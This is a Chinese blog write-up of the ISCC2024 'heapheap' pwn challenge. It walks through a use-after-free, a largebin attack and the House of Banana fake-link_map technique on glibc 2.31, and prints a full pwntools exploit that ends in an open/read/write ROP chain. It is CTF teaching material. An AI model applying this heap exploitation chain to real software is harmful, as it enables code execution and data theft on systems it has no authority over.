[CTF]-PWN:House of Banana堆块题型综合分析

已于 2024-07-08 20:34:42 修改
阅读量236 收藏 5
点赞数 2
分类专栏: PWN 文章标签: 安全 网络安全 linux
于 2024-07-06 20:02:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/140234171
版权

搭配largebin attack:

例题(ISCC2024 heapheap):

版本:glibc2.31

知识点:largebin attack、house of banana、uaf

查看保护

查看ida

delete存在uaf漏洞

largebin attack手法:

#创建4个堆块,其中第1个堆块和第3个堆块为可入largebin大小,第3个堆块大小小于第一个堆块,剩余的两个为保护堆块,大小适当即可

#释放堆块1,申请一个比堆块1更大的堆块

#释放堆块3

#修改堆块1的bk_nextsize为目标地址-0x20

#再申请一个比堆块1大的堆块,向目标地址写入堆块3的地址

伪造link_map:

link_map=p64(0)
link_map+=p64(l_next)
link_map+=p64(0)
link_map+=p64(chunk_base) #l_real
link_map+=p64(0)*28
link_map+=p64(chunk_base+0x110) #l-info[26] chunkbase+256
link_map+=p64(chunk_base+0x110+0x20)#l->l_info[26]->d_un.d_ptr 此处为指针数组array
link_map+=p64(chunk_base+0x110+0x10)#l-info[28]
link_map+=p64(0x20) #l-info[29] 此处除以8为i
link_map+=b"flag\x00\x00\x00\x00" #array[0]
link_map+=p64(chunk_base) #chunkbase为伪造link map的地址
link_map+=p64(setcontext_3d)
link_map+=p64(pop_rdi+1) #此处为ret 单纯只是ret
link_map+=p64(0)*12
link_map+=p64(0) #rdi rdx+0x68 read第一个参数
link_map+=p64(chunk_base+0x1f8) #rsi rdx+0x70 此处为read的第二个参数
link_map+=p64(0)*2
link_map+=p64(0x100)#rdx rdx+0x88 此处为read第三个参数
link_map+=p64(0)*2
link_map+=p64(chunk_base+0x1f8) #rsp rdx+0xa0 chunk+480 在setcontext执行后为rsp
link_map+=p64(libcbase+libc.sym['read']) #rcx rdx+0xa8 setcontext会跳转执行rcx
link_map+=p64(0)*36
link_map+=p64(0x800000000)

伪造link map主要是想利用结构体中的函数执行array[i]()

也就是执行read,将orw写入目标地址

这里可以直接照模板写

gdb查看原有link map操作:

rtld_global的指针是指向link map结构体的,所以可以查看其内容知道link map地址

输入命令:x/4gx &_rtld_global

输入命令:p *((struct link_map*)0x00007f9e6b7cd190)

 

完整exp:

from pwn import*
context(arch='amd64')
p=process('./heapheap')

def alloc(index,size):
    p.sendlineafter(b'Your choice:', b'1')
    p.sendlineafter(b"index:\n", str(index).encode())
    p.sendlineafter(b"Size:\n", str(size).encode())
def show(index):
    p.sendlineafter(b'Your choice:\n', b'2')
    p.sendlineafter(b"index:\n", str(index).encode())
    p.recvline()
def edit(index,content):
    p.sendlineafter(b'Your choice:', b'3')
    p.sendlineafter(b"index:", str(index).encode())
    p.sendafter(b"context:",content)
def free(index):
    p.sendlineafter(b'Your choice:', b'4')
    p.sendlineafter(b"index:\n", str(index).encode())

alloc(0,0x428)
alloc(1,0x500)
alloc(2,0x418)
free(0)
alloc(3,0x500)
show(0)
fd=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc=ELF('./libc-2.31.so')
libcbase=fd-0x430-0x30-libc.sym['__malloc_hook']
success("libcbase="+hex(libcbase))
payload=b'a'*0x10
edit(0,payload)
show(0)
p.recv(0x10)
oneheap=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(oneheap))
heapbase=oneheap-0x290
rtld_global=libcbase+0x228060-0x6000
free(2)
chunk_base=heapbase+0xbd0
print("l_next="+hex(rtld_global+0x16e0))
print("l_real="+hex(chunk_base))
print("l-info[26]="+hex(chunk_base+0x110))
print("l-info[27]="+hex(chunk_base+0x110+0x20))
print("rsp="+hex(chunk_base+0x1f8))
print("setcontext_3d="+hex(libcbase+libc.sym['setcontext']+0x3d))
print("pop_rdi="+hex(libcbase+0x23b6a))
print("chunkbase="+hex(chunk_base))
print("read="+hex(libc.sym['read']))
payload=p64(fd)*2+p64(oneheap)+p64(rtld_global-0x20)
edit(0,payload)
alloc(4,0x500)
pop_rdi=libcbase+0x23b6a
pop_rsi=libcbase+0x2601f
pop_rdx=libcbase+0x119431
setcontext_3d=libcbase+libc.sym['setcontext']+0x3d
l_next=rtld_global+0x16e0

link_map=p64(0)
link_map+=p64(l_next)
link_map+=p64(0)
link_map+=p64(chunk_base) #l_real
link_map+=p64(0)*28
link_map+=p64(chunk_base+0x110) #l-info[26] chunkbase+256
link_map+=p64(chunk_base+0x110+0x20)#l->l_info[26]->d_un.d_ptr
link_map+=p64(chunk_base+0x110+0x10)#l-info[28]
link_map+=p64(0x20) #l-info[29]
link_map+=b"flag\x00\x00\x00\x00"
link_map+=p64(chunk_base)
link_map+=p64(setcontext_3d)
link_map+=p64(pop_rdi+1) 
link_map+=p64(0)*12
link_map+=p64(0) #rdi rdx+0x68
link_map+=p64(chunk_base+0x1f8) #rsi rdx+0x70
link_map+=p64(0)*2
link_map+=p64(0x100)#rdx rdx+0x88
link_map+=p64(0)*2
link_map+=p64(chunk_base+0x1f8) #rsp rdx+0xa0 chunk+480
link_map+=p64(libcbase+libc.sym['read']) #rcx rdx+0xa8
link_map+=p64(0)*36
link_map+=p64(0x800000000)
edit(2,link_map)
p.sendlineafter(b'Your choice:',b'5')
flag_addr = chunk_base+0x130
orw=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(libcbase+libc.sym['open'])
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(heapbase+0x2a0)+p64(pop_rdx)+p64(0x50)+p64(0)+p64(libcbase+libc.sym['read'])
orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(heapbase+0x2a0)+p64(pop_rdx)+p64(0x50)+p64(0)+p64(libcbase+libc.sym['write'])
p.send(orw)
p.interactive()
clxhzg
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 2957
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1469
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这段代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
CTF-PWN学习-为缺少指导的同学而生
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
ctf-pwn nc总结
weixin_61995249的博客
05-21 2219
命令来查看文件或目录的详细信息,并根据文件的属性来确定其类
从零开始搭建Ubuntu CTF-pwn环境
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
CTF-PWN环境搭建手册
yuwoxinanA3的博客
11-17 2025
CTF-PWN方向必备解环境
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4015
知识点 解流程 方法一 查看文件类: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该目为典的格式字符串漏洞。 解思路 此的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
BugkuCTF-PWNcanary超详细讲解
am_03的博客
08-31 2204
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解流程 目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
ctf-web:文件上传漏洞和文件解析漏洞
热门推荐
薯片薯条的博客
10-11 9万+
这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么… 当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了. 先说说这两个漏洞的区别. 一.文件上传漏洞 这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.
CTF-PWN环境搭建
Yu3511606536的博客
10-17 1506
PWN从入门到放弃:CTF-PWN环境搭建
ctfctf-pwn收集
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-tools:CTF工具集合
02-04
ctf-tools:CTF工具集合
CTF-Heaven:TF CTF天堂
05-06
欢迎来到CTF的世界 :skull_and_crossbones:‍:skull_and_crossbones: | 2021年3月12日| 鸣谢:( 和( 。 这是每个类别的一些基础知识的简介。 它旨在帮助初学者和老同志,享受骑行和“ HackThePlanet”。 这些...
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 332
亚信安全发布2024年6月威胁态势
构建安全稳定的应用:SpringSecurity实用指南
zhugedali_的博客
07-04 691
它涵盖了认证(Authentication)、授权(Authorization)、防止常见的安全攻击等多个方面,适用于各种类的应用,包括 Web 应用、RESTful 服务、微服务等。- 生成认证对象:认证成功后,创建包含用户信息、角色和权限的 Authentication 对象,并存储在安全上下文中。- 加载用户角色和权限:除了基本的用户信息,还包括用户所拥有的角色和权限。- 认证请求处理:根据配置的认证方式,对用户提交的认证信息进行验证。
【易捷海购-注册安全分析报告】
最新发布
weixin_46641057的博客
07-05 1193
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 896
然后这一步,你看,这里有个决策点
我的ctfwp笔记
03-25
我的ctfwp笔记

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值